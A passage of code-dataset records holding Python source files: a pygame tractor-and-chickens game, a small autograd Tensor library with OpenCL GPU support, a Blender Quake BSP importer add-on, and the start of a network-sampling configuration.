pygame.image.load(\"chicken_icon.png\")\r\ncarSprite = pygame.image.load(\"tractor_sprite.png\").convert_alpha()\r\nchickenSprite = pygame.image.load(\"chicken_sprite.png\").convert_alpha()\r\nbloodSplatter = pygame.image.load(\"blood.png\").convert_alpha()\r\npygame.display.set_icon(gameIcon)\r\n\r\n# Tractor dimensions and scaling\r\ncarWidth = int(0.105 * xDisplay)\r\ncarHeight = int(0.233 * yDisplay)\r\ncarSprite = pygame.transform.scale(carSprite, (carWidth, carHeight))\r\n\r\n# Chicken dimensions and scaling\r\nchickenWidth = int(0.0925 * xDisplay)\r\nchickenHeight = int(0.123 * yDisplay)\r\nchickenSprite = pygame.transform.scale(chickenSprite, (chickenWidth, chickenHeight))\r\n\r\n# Blood spatter dimensions and scaling\r\nbloodWidth = int(0.1875 * xDisplay)\r\nbloodHeight = int(0.25 * yDisplay)\r\nbloodSplatter = pygame.transform.scale(bloodSplatter, (bloodWidth, bloodHeight))\r\n\r\ncolors = {\r\n    \"black\": (0, 0, 0),\r\n    \"red\": (255, 0, 0),\r\n    \"green\": (0, 255, 0),\r\n    \"darkRed\": (175, 0, 0),\r\n    \"darkGreen\": (0, 175, 0),\r\n    \"brown\": (121, 67, 33)\r\n}\r\n\r\n# Insults for crashes in game\r\nlossCount = -1\r\nlossList = [\r\n    \"That's what you call driving?\",\r\n    \"Your mother was a hamster!\",\r\n    \"Your father smelt of elderberries!\"\r\n]\r\n\r\nclock = pygame.time.Clock()\r\n\r\n########################################################################################################################\r\n############################################ Game Functions ############################################################\r\n########################################################################################################################\r\n\r\n\r\ndef draw_intro_screen():\r\n    \"\"\"\r\n    Start menu.\r\n    \"\"\"\r\n    # Animating chicken sprite.\r\n    chick_x = xDisplay * 0.1875\r\n    chick_y = yDisplay * 0.55\r\n    chick_dir = True\r\n\r\n    while 1:\r\n        for event in pygame.event.get():\r\n            quit_program(event)\r\n\r\n        # Controls chicken's movement\r\n        if chick_x > xDisplay * 0.65 or chick_x < xDisplay * 0.1875:\r\n            chick_dir = not chick_dir\r\n\r\n        if chick_dir:\r\n            chick_x += 5\r\n        else:\r\n            chick_x -= 5\r\n\r\n        # Updates display\r\n        gameDisplay.fill(colors[\"darkGreen\"])\r\n        pygame.draw.rect(gameDisplay, colors[\"brown\"], (25, 0, xDisplay - 50, yDisplay))\r\n        display_message(xDisplay / 2, yDisplay / 3, 75, \"Chicken! Bwak!\")\r\n\r\n        draw_chicken(chick_x, chick_y)\r\n\r\n        draw_button(\"I'm no chicken!\", 0.15 * xDisplay, 0.75 * yDisplay, 175, 50,\r\n                    colors[\"darkGreen\"], colors[\"green\"], \"play\")\r\n        draw_button(\"Chicken out...\", 0.65 * xDisplay, 0.75 * yDisplay, 175, 50,\r\n                    colors[\"darkRed\"], colors[\"red\"], \"quit\")\r\n\r\n        pygame.display.update()\r\n        clock.tick(60)\r\n\r\n\r\ndef draw_button(message, x, y, width, height, inactive_color, active_color, action):\r\n    \"\"\"\r\n    Generates button at x, y of width and height. Color changes from inactive_color\r\n    to active_color on hover. 
Action can be either 'Play' or 'Quit'.\r\n \"\"\"\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n\r\n buttonRect = pygame.Rect(x, y, width, height)\r\n\r\n if buttonRect.collidepoint(mouse):\r\n pygame.draw.rect(gameDisplay, colors[\"black\"], (x, y, width, height))\r\n pygame.draw.rect(gameDisplay, active_color, (x + 2, y + 2, width - 4, height - 4))\r\n\r\n if click[0]:\r\n if action == \"play\":\r\n game_loop()\r\n elif action == \"quit\":\r\n pygame.quit()\r\n quit()\r\n else:\r\n pygame.draw.rect(gameDisplay, colors[\"black\"], (x, y, width, height))\r\n pygame.draw.rect(gameDisplay, inactive_color, (x + 2, y + 2, width - 4, height - 4))\r\n\r\n display_message(x + (width / 2), y + (height / 2), 20, message)\r\n\r\n\r\ndef draw_tractor(tractor_x, tractor_y):\r\n \"\"\"\r\n Draws the tractor at tractor_x, tractor_y.\r\n \"\"\"\r\n gameDisplay.blit(carSprite, (tractor_x, tractor_y))\r\n\r\n\r\ndef draw_chicken(chick_x, chick_y):\r\n \"\"\"\r\n Draws a chicken at chick_x and chick_y.\r\n \"\"\"\r\n gameDisplay.blit(chickenSprite, (chick_x, chick_y))\r\n\r\n\r\ndef blood_splatter(blood_x, blood_y):\r\n \"\"\"\r\n Draws blood at coordinates based on blood_x, blood_y.\r\n Coordinates are manually adjusted to center blood over chicken.\r\n \"\"\"\r\n gameDisplay.blit(bloodSplatter, (blood_x - (chickenWidth / 2),\r\n blood_y - (chickenHeight / 2)))\r\n\r\n\r\ndef display_message(horiz, vert, font_size, text):\r\n \"\"\"\r\n Writes text of font_size to display at horiz, vert.\r\n \"\"\"\r\n print_text = pygame.font.Font(\"fixedsys.ttf\", font_size)\r\n text_surface = print_text.render(text, True, colors[\"black\"])\r\n text_rect = text_surface.get_rect()\r\n text_rect.center = (horiz, vert)\r\n gameDisplay.blit(text_surface, text_rect)\r\n\r\n\r\ndef count(game_count, chicken_count):\r\n \"\"\"\r\n Displays updating game_count and chicken_count.\r\n \"\"\"\r\n score_text = \"Score: \" + str(game_count)\r\n chicken_text = \"Remaining: \" + str(chicken_count)\r\n display_message(xDisplay * 0.9, yDisplay * 0.025, 25, score_text)\r\n display_message(xDisplay * 0.15, yDisplay * 0.025, 25, chicken_text)\r\n\r\n\r\ndef crash():\r\n \"\"\"\r\n Game over menu.\r\n \"\"\"\r\n global lossCount\r\n\r\n if lossCount < len(lossList) - 1:\r\n lossCount += 1\r\n else:\r\n lossCount = 0\r\n\r\n while 1:\r\n for event in pygame.event.get():\r\n quit_program(event)\r\n\r\n display_message(xDisplay / 2, yDisplay / 3, 30, lossList[lossCount])\r\n\r\n draw_button(\"Play Again?\", 0.2125 * xDisplay, 0.75 * yDisplay, 130, 50, colors[\"darkGreen\"],\r\n colors[\"green\"], \"play\")\r\n draw_button(\"Chicken out...\", 0.65 * xDisplay, 0.75 * yDisplay, 175, 50, colors[\"darkRed\"], colors[\"red\"], \"quit\")\r\n\r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\n\r\ndef paused(pause):\r\n \"\"\"\r\n Pauses and unpauses the game and the music.\r\n \"\"\"\r\n pygame.mixer.music.pause()\r\n\r\n while pause:\r\n for event in pygame.event.get():\r\n quit_program(event)\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_p:\r\n pause = False\r\n pygame.mixer.music.unpause()\r\n\r\n display_message(xDisplay / 2, yDisplay / 3, 75, \"Paused\")\r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\n\r\ndef win(score, chickens):\r\n \"\"\"\r\n Win menu.\r\n \"\"\"\r\n pygame.mixer.music.fadeout(2000)\r\n\r\n while 1:\r\n for event in pygame.event.get():\r\n quit_program(event)\r\n\r\n display_message(xDisplay / 2, yDisplay / 4, 40, \"Winner winner chicken dinner!\")\r\n 
display_message(xDisplay / 2, yDisplay / 2, 30, \"Final score: \" + str(score))\r\n average = round(float(score) / float(chickens), 1)\r\n display_message(xDisplay / 2, 3 * yDisplay / 5, 30, \"Average per chicken: \" + str(average))\r\n\r\n draw_button(\"Play again?\", 0.15 * xDisplay, 0.75 * yDisplay, 175, 50,\r\n colors[\"darkGreen\"], colors[\"green\"], \"play\")\r\n draw_button(\"Chicken out...\", 0.65 * xDisplay, 0.75 * yDisplay, 175, 50, colors[\"darkRed\"], colors[\"red\"], \"quit\")\r\n\r\n pygame.display.update()\r\n clock.tick(15)\r\n\r\n\r\ndef quit_program(event):\r\n \"\"\"\r\n Terminates the program if the event is quit.\r\n \"\"\"\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n\r\n########################################################################################################################\r\n############################################# Main Game Loop ###########################################################\r\n########################################################################################################################\r\n\r\ndef game_loop():\r\n score = 0\r\n chickenCount = 30\r\n passed = 0\r\n hit = False\r\n\r\n # Starting coordinates for tractor\r\n x_pos = xDisplay * 0.455\r\n y_pos = yDisplay * 0.75\r\n x_change = 0\r\n\r\n # Starting coordinates and speed for chicken\r\n chicken_speed = 0.00833 * yDisplay\r\n chicken_x = random.randrange(25, int(xDisplay - (chickenWidth + 25)))\r\n chicken_y = -yDisplay\r\n\r\n pygame.mixer.music.play(-1)\r\n\r\n while chickenCount > 0:\r\n\r\n # controls\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n x_change = -0.011 * xDisplay\r\n elif event.key == pygame.K_RIGHT:\r\n x_change = 0.011 * xDisplay\r\n elif event.key == pygame.K_p:\r\n paused(True)\r\n\r\n elif event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n x_change = 0\r\n\r\n x_pos += x_change\r\n\r\n # Handles crashing into boundaries\r\n if x_pos + carWidth >= xDisplay + 10 or x_pos <= -10:\r\n pygame.mixer.music.stop()\r\n pygame.mixer.Sound.play(crashSound)\r\n crash()\r\n\r\n # Handles crashing into chickens\r\n if y_pos + 0.03 * yDisplay < chicken_y + chickenHeight and \\\r\n (x_pos + (0.03 * xDisplay) < chicken_x < x_pos + carWidth - (0.03 * xDisplay) or\r\n x_pos + (0.03 * xDisplay) < chicken_x + chickenWidth < x_pos + carWidth - (0.03 * xDisplay) or\r\n x_pos < chicken_x + (chickenWidth / 2) < x_pos + carWidth) and not hit:\r\n pygame.mixer.Sound.play(squishSound)\r\n hit = True\r\n if score >= 50:\r\n score -= 50\r\n else:\r\n score = 0\r\n\r\n # Updates score while on path to crash into chickens.\r\n elif (x_pos + (0.03 * xDisplay) < chicken_x < x_pos + carWidth - (0.03 * xDisplay) or\r\n x_pos + (0.03 * xDisplay) < chicken_x + chickenWidth < x_pos + carWidth - (\r\n 0.03 * xDisplay) or x_pos < chicken_x + (chickenWidth / 2) < x_pos + carWidth) and not hit:\r\n score += int(30 ** (1 / (y_pos - (chicken_y + chickenHeight))))\r\n\r\n # Handles drawing of chickens\r\n if chicken_y > yDisplay:\r\n chicken_y = 0 - chickenHeight\r\n chicken_x = random.randrange(25, int(xDisplay - (chickenWidth + 25)))\r\n chickenCount -= 1\r\n passed += 1\r\n hit = False\r\n # Updates difficulty\r\n if chicken_speed < 0.02 * yDisplay:\r\n chicken_speed += 0.00075 * yDisplay\r\n\r\n # Updates display\r\n gameDisplay.fill(colors[\"darkGreen\"])\r\n 
pygame.draw.rect(gameDisplay, colors[\"brown\"], (25, 0, xDisplay - 50, yDisplay))\r\n\r\n if hit:\r\n blood_splatter(chicken_x, chicken_y)\r\n else:\r\n draw_chicken(chicken_x, chicken_y)\r\n\r\n draw_tractor(x_pos, y_pos)\r\n chicken_y += chicken_speed\r\n count(score, chickenCount)\r\n\r\n pygame.display.update()\r\n clock.tick(60)\r\n\r\n win(score, passed)\r\n\r\n\r\ndraw_intro_screen()\r\n","sub_path":"ChickenChaser.py","file_name":"ChickenChaser.py","file_ext":"py","file_size_in_byte":11919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544092142","text":"from typing import Union\nfrom collections import defaultdict\nimport warnings\nimport inspect\nfrom functools import partialmethod\nimport functools\n\nimport numpy as np\nfrom nanograd.viz.comp_graph import ForwardGraphVisualizer, BackwardGraphVisualizer\n\nfrom nanograd.device import Device\nfrom nanograd.nn.buffer import GPUBuffer\n\ncl_ctx, cl_queue = None, None\n\ndef get_gpu_context_and_queue():\n \"\"\"\n If GPU is enabled, get_gpu_context_and_queue populates global variables\n cl_ctx and cl_queue used for GPU computations. \n \n cl_ctx and cl_queue are PyOpenCL objects used for parallelized computations \n on the GPU. More precisely, cl_ctx is expected to be an instance of PyOpenCL \n Context and cl_queue is expected to be an instance of PyOpenCL CommandQueue.\n \"\"\"\n global cl_ctx, cl_queue\n devices = cl.get_platforms()[0].get_devices(device_type=cl.device_type.GPU)\n if len(devices) == 0:\n devices = cl.get_platforms()[0].get_devices(device_type=cl.device_type.CPU)\n cl_ctx = cl.Context(devices=devices)\n cl_queue = cl.CommandQueue(cl_ctx)\n\n\nclass Tensor:\n ops = defaultdict(dict) # Adding to the class several operations\n \"\"\"\n Tensor is the basic operator object of Nanograd. It is \n a wrapper class around NumPy array. \n\n Args:\n data (np.ndarray or int or float or GPUBuffer): Contains data to be stored. It can \n be a scalar, a vector, a matrix or a tensor (multi-dimensional array).\n\n requires_grad (bool, optional): If ``True``, a gradient will be stored and \n accumulated as a property of an object. If ``False``, the grad property \n remains None. No gradient is stored in the object.\n\n is_leaf (bool, optional): If ``True``, the corresponding node in the computational\n graph does not have any parents. Note that it is usually the case for parameters\n in a neural network. If ``False``, the node is expected to have parents. \n Usually a non-leaf node results from a basic operation.\n\n is_parameter (bool, optional): the Tensor contains trainable parameters. It is useful\n when building a neural network.\n\n device (Device, optional): the device to use for computations. Currently, Nanograd only\n supports CPU and GPU.\n\n name (str, optional): A name for the Tensor for visualization purposes.\n\n op (str, optional): The operation used to create the tensor. 
Could be a subtraction,\n            an addition, a product.\n\n    ..note::\n        If the node is gradient-enabled, the grad property is populated with a gradient Tensor\n        object during backpropagation.\n    \"\"\"\n    def __init__(self, \n                 data:Union[np.ndarray, GPUBuffer], \n                 requires_grad:bool=False, \n                 is_parameter:bool=False,\n                 device:Device=Device.CPU,\n                 name:str='no_name',\n                 op:str=None) -> None:\n        self.data = self._move_data(data, device)\n        self.requires_grad = requires_grad\n        self.is_parameter = is_parameter\n\n        self.device = device\n\n        self.grad = None\n        self.ctx = None\n\n        self.name, self.op = name, op\n        self.children = []\n    \n    @property\n    def shape(self) -> tuple:\n        return self.data.shape\n    \n    @property\n    def dtype(self) -> np.dtype:\n        return self.data.dtype\n\n    @property\n    def T(self):\n        return self.transpose()\n    \n    # ****************************************\n    # ***** Class methods / Initializers *****\n    # ****************************************\n\n    @classmethod\n    def zeros(cls, *shape, **kwargs):\n        \"\"\"Creates a Tensor filled with zeros\"\"\"\n        return cls(np.zeros(*shape, dtype=np.float32), **kwargs)\n    \n    @classmethod\n    def ones(cls, *shape, **kwargs):\n        \"\"\"Creates a Tensor filled with ones\"\"\"\n        return cls(np.ones(*shape, dtype=np.float32), **kwargs)\n    \n    @classmethod\n    def arange(cls, *interval, **kwargs):\n        \"\"\"Creates a Tensor filled with values in range\"\"\"\n        return cls(np.arange(*interval).astype(np.float32), **kwargs)\n    \n    @classmethod\n    def randn(cls, *shape, **kwargs):\n        \"\"\"\n        Creates a Tensor filled with values drawn from the\n        standard Gaussian distribution\n        \"\"\"\n        return cls(np.random.randn(*shape).astype(np.float32), **kwargs)\n    \n    @classmethod\n    def normal(cls, loc, scale, *shape, **kwargs):\n        \"\"\"\n        Creates a Tensor filled with values drawn from\n        a custom Gaussian distribution\n        \"\"\"\n        return cls(np.random.normal(loc, scale, *shape).astype(np.float32), **kwargs)\n\n    @classmethod\n    def randint(cls, low, high, *shape, **kwargs):\n        \"\"\"\n        Creates a Tensor filled with integer values drawn in the\n        range between low and high\n        \"\"\"\n        return cls(np.random.randint(low, high, *shape).astype(np.float32), **kwargs)\n    \n    @classmethod\n    def eye(cls, dim, **kwargs):\n        \"\"\"\n        Creates a 2-dimensional Tensor (matrix) equal to the\n        identity matrix.\n        \"\"\"\n        return cls(np.eye(dim).astype(np.float32), **kwargs)\n    \n    # ****************************************\n    # *********** CPU/GPU support ************\n    # ****************************************\n\n    @staticmethod\n    def _move_data(data:Union[np.ndarray, GPUBuffer], device:Device):\n        \"\"\"\n        Moves data to the device specified\n\n        Args:\n            data (np.ndarray or GPUBuffer): data to be moved\n            device (Device): the destination device\n        \n        Returns:\n            data (np.ndarray or GPUBuffer): numpy array if CPU else cl.Buffer\n        \"\"\"\n        assert device in Device, \"Unsupported device. 
Only CPU and GPU available.\"\n\n if isinstance(data, GPUBuffer):\n if device == Device.GPU:\n return data\n cpu_data = np.empty(data.shape, dtype=np.float32)\n cl.enqueue_copy(cl_queue, cpu_data, data.cl, is_blocking=True)\n return cpu_data\n \n if not isinstance(data, np.ndarray):\n data = np.array(data, dtype=np.float32)\n\n if device == Device.GPU:\n if cl_ctx is None:\n get_gpu_context_and_queue()\n return GPUBuffer(cl_ctx, data.shape, hostbuf=data)\n\n return data\n\n def to(self, device:Device):\n \"\"\"\n Moves the Tensor to the specified device \n \n Args:\n device (Device): the destination device\n \"\"\"\n self.data, self.device = self._move_data(self.data, device), device\n if self.grad:\n self.grad.to(device) # Recursive call to move the gradient to specified device\n\n def cpu(self):\n self.to(Device.CPU)\n return self\n \n def gpu(self):\n if not PYOPENCL_AVAILABLE:\n raise Exception(\"OpenCL is not installed in this environment. Please consider running \\\n pip install pyopencl to benefit from GPU-accelerated computations.\")\n self.to(Device.GPU)\n return self\n\n # ****************************************\n # *************** Backprop ***************\n # ****************************************\n\n @functools.lru_cache()\n def build_graph_topology(self):\n def dfs(node, visited, nodes):\n visited.add(node)\n if node.ctx:\n for parent in node.ctx.parents:\n if parent not in visited:\n dfs(parent, visited, nodes)\n nodes.append(node)\n return nodes\n return dfs(self, set(), list())\n \n def backward(self):\n if self.shape != (1,):\n raise Exception(\"Can't initiate backprop from a non scalar-valued tensor.\")\n\n self.grad = Tensor.ones(self.shape, device=self.device, requires_grad=False)\n\n for node in reversed(self.build_graph_topology()):\n assert node.grad is not None, 'Got an unitialized gradient node'\n\n gradients = node.ctx.backward(node.ctx, node.grad.data)\n\n if len(node.ctx.parents) == 1:\n gradients = [gradients]\n \n for tensor, grad in zip(node.ctx.parents, gradients):\n if grad is not None: \n assert grad.shape == tensor.shape, f\"Mismatched tensor and grad shape. Got {grad.shape} and {tensor.shape}. \\\n Tensor and gradient should have the same shape.\"\n if tensor.grad is None:\n tensor.grad = Tensor(grad, device=self.device, requires_grad=False)\n else:\n tensor.grad += Tensor(grad, device=self.device, requires_grad=False)\n\n def copy(self):\n \"\"\"Creates a copy of the tensor\"\"\"\n return Tensor(self.data, device=self.device)\n\n def __str__(self):\n return f\"\"\n \n def __repr__(self):\n return self.__str__()\n\n def __getitem__(self, args):\n if args is None: \n args = []\n elif type(args) in [list, tuple]: \n pass\n else: \n args = [args]\n\n indices = []\n\n for i, arg in enumerate(args):\n start, stop = arg.start, arg.stop\n\n if start is None:\n start = 0\n elif not np.issubdtype(type(start), int):\n raise TypeError(f\"Indices must be integer. Got {type(start)}\")\n \n if stop is None:\n stop = self.shape[i]\n elif not np.issubdtype(type(stop), int):\n raise TypeError(f\"Indices must be integer. 
Got {type(stop)}\")\n            elif stop < 0:\n                stop = self.shape[i] + stop\n\n            assert arg.step is None or arg.step == 1, \"Custom step not yet implemented\"\n            indices.append((start, stop))\n        \n        indices += [(0, self.shape[i]) for i in range(len(args), len(self.shape))]\n        \n        return self.slice(indices=indices)\n\n    # ****************************************\n    # ********** Basic operations ************\n    # ****************************************\n    \n    def __truediv__(self, other):\n        return self * (other ** -1.0)\n\n    def __sub__(self, other):\n        return self + (-other)\n\n    def __rsub__(self, other):\n        return -self + other\n\n    def sqrt(self):\n        return self ** 0.5\n    \n    # ****************************************\n    # ******** Reduction operations **********\n    # ****************************************\n    \n    def mean(self, axis=None):\n        out = self.sum(axis=axis)\n        coeff = np.prod(out.shape) / np.prod(self.shape)\n        return out * coeff\n\n    # ****************************************\n    # ****** Miscellaneous operations ********\n    # ****************************************\n\n    def flatten(self):\n        dim1, dim2 = self.shape[0], np.prod(self.shape[1:])\n        out = self.reshape(shape=(dim1, dim2))\n        return out\n\n    # ****************************************\n    # ******** Activation functions **********\n    # ****************************************\n    \n    def log_softmax(self):\n        batch_size, num_classes = self.shape\n        a = self.max(axis=1).reshape(shape=[batch_size, 1])  # Log-exp trick\n        out = self - a - (self - a).exp().sum(axis=1).log().reshape(shape=[batch_size, 1])\n        return out\n\n    # ****************************************\n    # ********* Pool operations *********\n    # ****************************************\n\n    def _pool1d(self, field_length:int):\n        \"\"\"1-dimensional pooling operation\n\n        Args:\n            field_length (int): length of the pooling kernel\n        \n        Returns:\n            x_reshaped (Tensor): pooled Tensor\n        \"\"\"\n        x_unpadded = self[:, :, :self.shape[2] - self.shape[2] % field_length]\n\n        shape = (x_unpadded.shape[0], x_unpadded.shape[1], \n                 x_unpadded.shape[2] // field_length, field_length)\n\n        x_reshaped = x_unpadded.reshape(shape=shape)\n        return x_reshaped  \n    \n    def max_pool1d(self, kernel_size:int=2):\n        \"\"\"MaxPooling1d operation\n\n        Args:\n            kernel_size (int, optional): Kernel length for pooling operation. Defaults to 2.\n        \"\"\"\n        return self._pool1d(kernel_size).max(axis=3)\n    \n    def avg_pool1d(self, kernel_size:int=2):\n        \"\"\"AvgPooling1d operation\n\n        Args:\n            kernel_size (int, optional): Kernel length for pooling operation. 
Defaults to 2.\n        \"\"\"\n        return self._pool1d(kernel_size).mean(axis=3)\n    \n    def _pool2d(self, pool_size:tuple):\n        \"\"\"\n        2-dimensional pooling operation\n\n        Args:\n            pool_size (tuple): height and width of the pooling kernel\n        \n        Returns:\n            x_reshaped (Tensor): pooled Tensor\n        \"\"\"\n        x_unpadded = self[:, :, \n                          :self.shape[2] - self.shape[2] % pool_size[0], \n                          :self.shape[3] - self.shape[3] % pool_size[1]]\n        \n        shape = (x_unpadded.shape[0], x_unpadded.shape[1], \n                 x_unpadded.shape[2] // pool_size[0], pool_size[0], \n                 x_unpadded.shape[3] // pool_size[1], pool_size[1])\n\n        x_reshaped = x_unpadded.reshape(shape=shape)\n\n        return x_reshaped\n    \n    def max_pool2d(self, pool_size:tuple=(2, 2)):\n        \"\"\"MaxPooling2d operation\n        \n        Args:\n            pool_size (tuple): Kernel size for the pooling operation\n        \"\"\"\n        return self._pool2d(pool_size).max(axis=(3, 5))\n    \n    def avg_pool2d(self, pool_size:tuple=(2, 2)):\n        \"\"\"AvgPooling2d operation\n        \n        Args:\n            pool_size (tuple): Kernel size for the pooling operation\n        \"\"\"\n        return self._pool2d(pool_size).mean(axis=(3, 5))\n\n    def pad1d(self, pad:tuple):\n        \"\"\"Padding for one-dimensional signal\n\n        Args:\n            pad (tuple): Amount of padding before and after the signal\n\n        Returns:\n            Tensor: Padded signal\n        \"\"\"\n        return self[:, :, -pad[0]:int(self.shape[2])+pad[1]]\n\n    def pad2d(self, pad:tuple):\n        \"\"\"Padding for two-dimensional images\n\n        Args:\n            pad (tuple): 4-dimensional tuple. Amount of padding to be applied before and\n                after the signal along 2 dimensions\n\n        Returns:\n            Tensor: Padded signal\n        \"\"\"\n        return self[:, :, -pad[2]:int(self.shape[2])+pad[3], -pad[0]:int(self.shape[3])+pad[1]]\n\n\n    # ****************************************\n    # ************ Visualization *************\n    # ****************************************\n\n    def plot_forward(self, rankdir=\"LR\"):\n        r\"\"\"\n        Plots a forward computational graph\n\n        Args:\n            rankdir (str): LR (left to right) and TB (top to bottom)\n        \"\"\"\n        visualizer = ForwardGraphVisualizer()\n        return visualizer.visualize(self, rankdir=rankdir)\n    \n    def plot_backward(self, rankdir=\"LR\"):\n        r\"\"\"\n        Plots a backward computational graph\n\n        Args:\n            rankdir (str): LR (left to right) and TB (top to bottom)\n        \"\"\"\n        visualizer = BackwardGraphVisualizer()\n        return visualizer.visualize(self, rankdir=rankdir)\n\n\ndef register(name, operation, device=Device.CPU):\n    \"\"\"Registers operation to the Tensor class\n\n    More precisely, it populates the ops dictionary by adding CPU and \n    GPU operations.\n\n    In short:\n        ops[device][name] = operation\n\n    Args:\n        name (str): Key representing the operation stored in the ops dictionary\n        operation (class, inherits from Function): Value in the dictionary\n        device (Device, optional): The device on which the operation is executed. 
Defaults to Device.CPU.\n    \"\"\"\n\n    Tensor.ops[device][name] = operation\n    \n    def dispatch(*args, **kwargs):\n        \"\"\"Modifies the operation arguments and adds the operation \n        to the ops dictionary\n\n        Returns:\n            function: Forward pass (apply) of the operation\n        \"\"\"\n        input = [arg for arg in args if isinstance(arg, Tensor)][0]\n        args = [Tensor(np.array([arg], dtype=input.dtype), device=input.device) \n                if not isinstance(arg, Tensor) else arg for arg in args]\n        \n        op = Tensor.ops[input.device][name]\n        op.cl_ctx, op.cl_queue, op.device = cl_ctx, cl_queue, input.device  # For GPU support\n        return op.apply(op, *args, **kwargs)\n\n    if name in ['add', 'mul', 'pow', 'matmul', 'neg']:\n        setattr(Tensor, f\"__{name}__\", dispatch)\n        if name != 'neg':\n            setattr(Tensor, f\"__r{name}__\", lambda self, x: dispatch(x, self))\n    else:\n        setattr(Tensor, name, dispatch)\n\n\ndef register_ops(namespace, device=Device.CPU):\n    for name, cls in inspect.getmembers(namespace, inspect.isclass):\n        if name[0] != \"_\": \n            register(name.lower(), cls, device=device)\n\n\nfrom nanograd.nn import ops_cpu\n\nregister_ops(ops_cpu)\n\ntry:\n    import pyopencl as cl\n    from nanograd.nn import ops_gpu\n    register_ops(ops_gpu, device=Device.GPU)\n\n    PYOPENCL_AVAILABLE = True\n\nexcept ImportError:\n    PYOPENCL_AVAILABLE = False\n    warnings.warn(\"PyOpenCL is not available on this computer. Can't use \\\n        parallel computing. Please install it to move computations \\\n        to the GPU.\")\n","sub_path":"nanograd/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":17761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"214572261","text":"bl_info = {\n    'name': 'Quake BSP format',\n    'author': 'Joshua Skelton',\n    'version': (0, 0, 2),\n    'blender': (2, 79, 0),\n    'location': 'File > Import-Export',\n    'description': 'Load a Quake BSP file.',\n    'warning': '',\n    'wiki_url': '',\n    'support': 'COMMUNITY',\n    'category': 'Import-Export'}\n\nif 'bpy' in locals():\n    import importlib\n\n    if 'import_bsp' in locals():\n        importlib.reload(import_bsp)\n    if 'export_bsp' in locals():\n        importlib.reload(export_bsp)\n\nimport bpy\nfrom bpy.props import (\n    StringProperty,\n    BoolProperty,\n    FloatProperty\n)\n\nfrom bpy_extras.io_utils import (\n    ImportHelper,\n    ExportHelper,\n)\n\n\nclass ImportBSP(bpy.types.Operator, ImportHelper):\n    \"\"\"Load a Quake BSP File\"\"\"\n\n    bl_idname = 'import_scene.bsp'\n    bl_label = 'Import BSP'\n    bl_options = {'UNDO', 'PRESET'}\n\n    filename_ext = '.bsp'\n    filter_glob = StringProperty(\n        default='*.bsp',\n        options={'HIDDEN'},\n    )\n\n    global_scale = FloatProperty(\n        name='Scale',\n        min=0.001, max=1000.0,\n        default=1.0 / 32.0,\n    )\n\n    use_worldspawn_entity = BoolProperty(\n        name='Import Worldspawn Entity',\n        description='Import worldspawn entities',\n        default=True\n    )\n\n    use_brush_entities = BoolProperty(\n        name='Import Brush Entities',\n        description='Import brush entities',\n        default=True\n    )\n\n    use_point_entities = BoolProperty(\n        name='Import Point Entities',\n        description='Import point entities',\n        default=True\n    )\n\n    def execute(self, context):\n        keywords = self.as_keywords(ignore=(\"filter_glob\",))\n        from . 
import import_bsp\n\n return import_bsp.load(self, context, **keywords)\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, 'global_scale')\n layout.prop(self, 'use_worldspawn_entity')\n layout.prop(self, 'use_brush_entities')\n layout.prop(self, 'use_point_entities')\n\n\nclass ExportBSP(bpy.types.Operator, ExportHelper):\n \"\"\"Save a Quake BSP File\"\"\"\n\n bl_idname = 'export_scene.bsp'\n bl_label = 'Export BSP'\n bl_options = {'PRESET'}\n\n filename_ext = '.bsp'\n filter_glob = StringProperty(\n default='*.bsp',\n options={'HIDDEN'},\n )\n\n check_extension = True\n\n def execute(self, context):\n from . import export_bsp\n\n keywords = self.as_keywords(ignore=('axis_forward',\n 'axis_up',\n 'global_scale',\n 'check_existing',\n 'filter_glob',\n ))\n\n return export_bsp.save(self, context, **keywords)\n\n\ndef menu_func_import(self, context):\n self.layout.operator(ImportBSP.bl_idname,\n text='Quake BSP (.bsp)')\n\n\ndef menu_func_export(self, context):\n self.layout.operator(ExportBSP.bl_idname,\n text='Quake BSP (.bsp)')\n\n\ndef register():\n bpy.utils.register_module(__name__)\n\n bpy.types.INFO_MT_file_import.append(menu_func_import)\n #bpy.types.INFO_MT_file_export.append(menu_func_export)\n\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n\n bpy.types.INFO_MT_file_import.remove(menu_func_import)\n #bpy.types.INFO_MT_file_export.remove(menu_func_export)\n\n\nif __name__ == '__main__':\n register()\n","sub_path":"quake/extra/io_scene_bsp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"117446124","text":"# -*- coding: utf-8 -*-\nimport networkx as nx\nimport os\n\nname = \"fb_100_diffRec_1.1-1.1_s500.txt\"\nprint( 'Executing Options: {}'.format(name))\n\noutfile_name = ''.join([\"/Volumes/TerraFirma/RDS/samples/\", name])\nif os.name == 'nt':\n outfile_name = os.path.normpath(os.path.join(\"R:/\", \"RDS\", \"samples\", name))\n\n# sampling parameter values\nsampling_params = {\n 'sample_size': [500], # list\n 'num_samples': 200, # int\n 'seed_count': [5], # list\n 'replacement_levels': [0], # choose with [1] or without [0] replacement or both [0, 1]\n}\n \nnot_batch_mode=True\n\nsim_params = {\n # parameter function definitions \n 'rec_activity_method': recact.rec_value_bias_random,\n 'rec_parameters': [ 0,\n [('0','1'), ([1,1,1,1,1,1,1,1,1,2], [1,1,1,1,1,1,1,1,1,2])]],\n 'rec_method': reccho.meth_random,\n 'rec_method_params': None,\n 'att_levels': [ \n ('fresh', ('0','1')),\n ('sophmore', ('0','1')),\n ('junior', ('0','1')),\n ('senior', ('0','1')),\n ] }\n\nnetworks = [\n\"American75\", \"Amherst41\", 